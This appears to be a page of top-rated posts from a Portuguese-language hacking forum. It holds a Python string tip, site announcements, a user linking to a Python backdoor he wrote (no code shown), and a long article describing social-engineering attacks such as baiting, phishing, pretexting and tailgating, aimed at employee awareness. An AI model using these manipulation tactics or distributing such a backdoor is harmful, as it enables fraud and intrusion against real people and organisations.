    Você está com dúvidas em concatenação de strings? >>> letras = abc >>> print(letras, "C") abc C >>> print(letras + "D") abcD Ou seja, a vírgula (,) mantém os valores originais das strings. E o (+) gera uma nova string, fazendo as duas anteriores perderem os valores originais.
  43. 2 pontos
    Pessoal, há uma semana enviei uma proposta de Ideia legislativa para o Senado Federal e hoje tive a minha bendita resposta sobre a dita cuja, trata-se de uma ideia anti monopólio estatal dos correios. Eles aprovaram mesmo eu tendo mandado uma parte irônica. Acho que é de utilidade e interesse de todos o fim do monopólio dessa bosta. https://www12.senado.leg.br/ecidadania/visualizacaoideia?id=71245
  44. 2 pontos
    Colabore com esta lista respondendo o tópico com suas sugestões. NÃO FAÇA SPAM!. Curso em Video - cursoemvideo.com Cursou - cursou.com.br
  45. 2 pontos
    Acabamos de deixar o fórum compatível com o Tapatalk. Agora, além de poder estar com a gente pelo desktop, podem estar também via celular! Basta baixar o aplicativo pela Google Play ou App Store e procurar por Fsociety Brasil. Além disso, você pode acompanhar as postagens do nosso site principal por lá: Agradecemos ao @uBeta pela sugestão e lembramos que sempre estamos abertos a mais sugestões!
  46. 2 pontos
    Acabamos de deixar o fórum compatível com o Tapatalk . Vocês podem baixar o aplicativo pela Google Play ou App Store e procurar por Fsociety Brasil.
  47. 2 pontos
    https://pastebin.com/FD7sX1Le TA AI !
  48. 2 pontos
    Eae grupo, vim compartilhar com vocês, uma Backdoor em python que eu fiz. Comecei a programar a pouco tempo, então claramente não será um puta script. Mas de qualquer forma, segue o pastebin: https://pastebin.com/yAsHtYWn Abç, Pr3sp3r -
  49. 2 pontos
    [align=center]ATAQUES DE ENGENHARIA SOCIAL: TUDO QUE VOCÊ PRECISA SABER![/align] [align=center]Chamamos de engenharia social qualquer estratégia não-técnica usada pelos hackers que, em grande parte, dependem da interação humana e geralmente envolvem iludir o usuário para desrespeitar práticas de segurança padrão, como abrir links maliciosos, baixar arquivos suspeitos ou compartilhar informações confidenciais que permitam ao hacker atingir seus objetivos.[/align] [align=center]O sucesso das técnicas de ataques de engenharia social depende da habilidade do hacker demanipular as vítimas para que executem certas ações ou ofereçam informações. Como não envolve nenhum aspecto técnico que possa ser reconhecido pelas ferramentas de segurança tradicionais, os ataques de engenharia social estão entre as maiores ameaças às empresas atualmente.[/align] [align=center]A maior diferença entre os ataques de engenharia social e o trabalho de hacking tradicional é que os ataques de engenharia social não envolvem o comprometimento ou a exploração de softwares ou sistemas. Quando é bem-sucedido, esse tipo de ataque permite que os hackers ganhem acesso legítimo a informações confidenciais.[/align] [align=center]Como funcionam os ataques de engenharia social[/align] [align=center] Hackers que recorrem a ataques de engenharia social não deixam de ser fraudadores e estelionatários. Eles usam técnicas do tipo com o objetivo de ganhar acesso legítimo à rede e aos dados da empresa roubando credenciais de usuários autorizados para se passar por funcionários da própria empresa. Um dos hackers mais famosos do mundo, , começou muito jovem a praticar engenharia social para pequenos ganhos. Chegou a revirar o lixo de empresas para conseguir informações e fazer telefonemas enganosos (você pode conhecer um pouco mais sobre essa história clicando ) É comum que esse tipo de cibercriminoso se aproveite da inocência e da natureza prestativa de alguns usuários. Eles podem, por exemplo, ligar para algum deles simulando ter de resolver algum incidente, dizendo então que necessita do acesso urgente à rede corporativa. Os ataques também podem ser feitos por meio das redes sociais. Os cibercriminosos podem apelar a uma série de sentimentos por meio dos perfis de redes sociais das vítimas, descobrindo, por exemplo, sua posição dentro da empresa, seus amigos e seus gostos pessoais. As táticas servem para convencer os usuários a abrir anexos infectados com malwares, persuadir funcionários a divulgar informações sensíveis ou até assustá-los para que instalem softwares infectados com malwares.[/align] [align=center]Principais tipos de ataques de engenharia social Os tipos mais comuns de ataques de engenharia social incluem baiting, phishing, pretexting, quid pro quo, spear phishing e tailgating. Soluções como firewalls, filtros de e-mail e ferramentas de monitoramento da rede e de dados podem ajudar a mitigar essas ameaças, porém, a conscientização do usuário é a tarefa mais importante para combater os ataques de engenharia social. Contar com funcionários capazes de reconhecer e evitar os tipos mais comuns de ataques de engenharia social é a melhor defesa nesses casos. Saiba mais sobre os tipos mais comuns de ações de engenharia social a que os funcionários devem saber reagir:[/align] [align=center]Baiting[/align] [align=center] Por meio dessa técnica, hackers deixam à disposição do usuário um dispositivo infectado com malware, como um pen-drive ou um CD. A intenção é despertar a curiosidade do indivíduo para que insira o dispositivo em uma máquina a fim de checar seu conteúdo. O sucesso dos ataques de baiting depende de três ações do indivíduo: encontrar o dispositivo, abrir seu conteúdo e instalar o malware sem perceber. Uma vez instalado, o malware permite que o hacker tenha acesso aos sistemas da vítima. A tática envolve pouco trabalho por parte do hacker. Tudo que ele precisa fazer é infectar um dispositivo e ocasionalmente deixá-lo à vista do alvo, seja na entrada ou no interior dos escritórios. O dispositivo pode ser, por exemplo, um pen-drive contendo um arquivo com nome “chamativo”, como “folha salarial 2017”. Em 2011, a Bloomberg relatou que, em um teste feito com funcionários do governo norte-americano, 60% das pessoas pegaram um pen-drive deixado no estacionamento e plugaram nos computadores do escritório. No caso dos dispositivos que tinham um logo oficial, 90% instalaram o arquivo.[/align] [align=center]Phishing[/align] [align=center] O e-mail de phishing, apesar de já existir há anos, ainda é uma das técnicas mais comuns de engenharia social pelo alto nível de eficiência. O phishing ocorre quando um hacker produz comunicações fraudulentas que podem ser interpretadas como legítimas pela vítima por alegarem vir de fontes confiáveis. Em um ataque de phishing, os usuários podem ser coagidos a instalar um malware em seus dispositivos ou a compartilhar informações pessoais, financeiras ou de negócio. Apesar de o e-mail ser o modo mais tradicional para o envio de phishing, esse tipo de ataque também pode vir na forma de um contato telefônica ou de uma mensagem no Facebook, por exemplo. Os piores ataques de phishing se aproveitam de situações trágicas com o objetivo de explorar a boa vontade das pessoas, fazendo com que passem informações pessoais e de pagamento para realizar doações, por exemplo. Alguns e-mails de phishing são incrivelmente fáceis de identificar, no entanto, há os que são extremamente convincentes, simulando, por exemplo, comunicações do banco e empresas de cartão de crédito e comunicados oficiais da própria empresa pedindo para que os funcionários façam download de um novo software de segurança corporativa.[/align] [align=center]Pretexting[/align] [align=center] Por meio do pretexting, os hackers fabricam falsas circunstâncias para coagir a vítima a oferecer acesso a informações e sistemas críticos. Nesse caso, os hackers assumem uma nova identidade ou papel para fingir que são alguém de confiança da vítima. Tudo que o cibercriminoso precisa é dar uma olhada nos perfis da vítima nas redes sociais para descobrir informações como data e local de nascimento, empresa, cargo, nomes de parentes, colegas de trabalho, amigos, entre outros. Depois, basta enviar um e-mail (ou outro tipo de comunicação) à vítima fingindo a necessidade de confirmar dados para garantir seu acesso a algum sistema específico. Pode ser, por exemplo, um e-mail supostamente da equipe de TI coagindo a vítima a divulgar suas credenciais. Quid pro quo Um ataque de quid pro quo ocorre quando um hacker requer informações privadas de alguém em troca de algo. “Quid pro quo” basicamente significa “isso por aquilo”, em que o cibercriminoso oferece algo à vítima em troca de informações sensíveis. A tática mais comum envolve se passar por alguém da TI e abordar diversas vítimas encontrar alguém com um problema real de TI. Sob instruções do hacker, a vítima então dá acesso a códigos, desabilita programas vitais e instala malwares achando que conseguirá resolver seu problema. Outra tática bastante usada é a de simular uma pesquisa em que funcionários passam uma série de informações sensíveis em troca de brindes, como canetas e canecas. Spear phishing O spear-phishing é uma forma mais sofisticada de phishing que foca em indivíduos e organizações específicas. Nesse tipo de ataque, o hacker se passa por algum executivo ou outro membro chave da empresa e aborda funcionários com intuito de obter informações sensíveis. Os cibercriminosos podem obter, por meio das redes sociais, informações sobre o alvo e o quadro organizacional da empresa. Depois disso, basta enviar alguma comunicação fingindo ser, por exemplo, um dos executivos da empresa com uma demanda urgente que requer uma transação financeira imediata para uma conta específica. Esse tipo de ataque costuma ter altas taxas de sucesso no convencimento de funcionários para que executem ações específicas ou passem informações sensíveis. Segundo o SANS Institute Report de 2016, os ataques de spear-phishing estão cada vez mais efetivos pois são tão tecnicamente convincentes que a maioria dos destinatários não se dá ao trabalho de procurar por pequenos indícios de fraude ou tentar se comunicar com o remetente por outro meio. A técnica também está sendo muito utilizada de forma direcionada para pequenas e médias empresas, pois geralmente são menos maduras em segurança. Confira o nosso artigo para saber mais! Tailgating O tailgating é uma técnica física de engenharia social que ocorre quando indivíduos não autorizados seguem indivíduos autorizados até localizações seguras. O objetivo é obter ativos valiosos e informações confidenciais. É o caso, por exemplo, de quando alguém pede para o outro “segurar a porta” porque esqueceu seu cartão de acesso, ou pede seu smartphone ou computador emprestado para fazer “algo rapidinho”, mas na verdade instala malwares e rouba dados da máquina. [/align]
  50. 2 pontos
    Pessoal, essa é a playlist do meu canal, que mostra comandos básicos pra quem quer dominar o terminal. Entendendo e praticando os comandos dos 5 vídeos, eu garanto a você que será capaz de navegar pelo terminal e realizar diversas ações, sozinho.
Esta tabela de classificação está definida como São Paulo/GMT-03:00
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.